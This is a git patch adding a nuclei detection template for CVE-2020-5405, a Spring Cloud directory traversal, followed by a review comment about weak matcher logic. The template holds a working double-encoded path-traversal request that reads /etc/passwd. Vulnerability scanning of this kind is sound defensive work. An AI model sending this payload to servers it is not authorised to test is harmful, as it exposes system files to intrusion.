From ebcf1ec0f669f30cfc3aed94ebffa00679aaa96c Mon Sep 17 00:00:00 2001
From: Harsh Bothra <66528650+harsh-bothra@users.noreply.github.com>
Date: Mon, 6 Jul 2020 21:52:18 +0530
Subject: [PATCH] Create CVE-2020-5405.yaml Spring Cloud Directory Traversal
---
cves/CVE-2020-5405.yaml | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 cves/CVE-2020-5405.yaml
diff --git a/cves/CVE-2020-5405.yaml b/cves/CVE-2020-5405.yaml
new file mode 100644
index 0000000000..9871bd3ef8
--- /dev/null
+++ b/cves/CVE-2020-5405.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-5405
+
+info:
+ name: Spring Cloud Directory Traversal
+ author: Harsh Bothra
+ severity: High
+
+# source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
+
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "root:"
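Review bot: The `matchers:` list has no `matchers-condition`, and nuclei combines matchers with `or` by default, so the status matcher alone reports every host that answers 200 for this path, including catch-all pages and SPA fallbacks. Adding `matchers-condition: and` directly above `matchers:` makes a finding require both the 200 and the body match. The word `"root:"` is also loose enough to hit ordinary HTML or documentation; a `regex` matcher on the body with a passwd-shaped pattern such as `root:.*:0:0:` would cut the remaining false positives. The `# source:-` comment sits between `info` and `requests` where tooling will not see it, so triage would be easier if the NVD link were kept with the `info` block, assuming the template schema in use has a field for it.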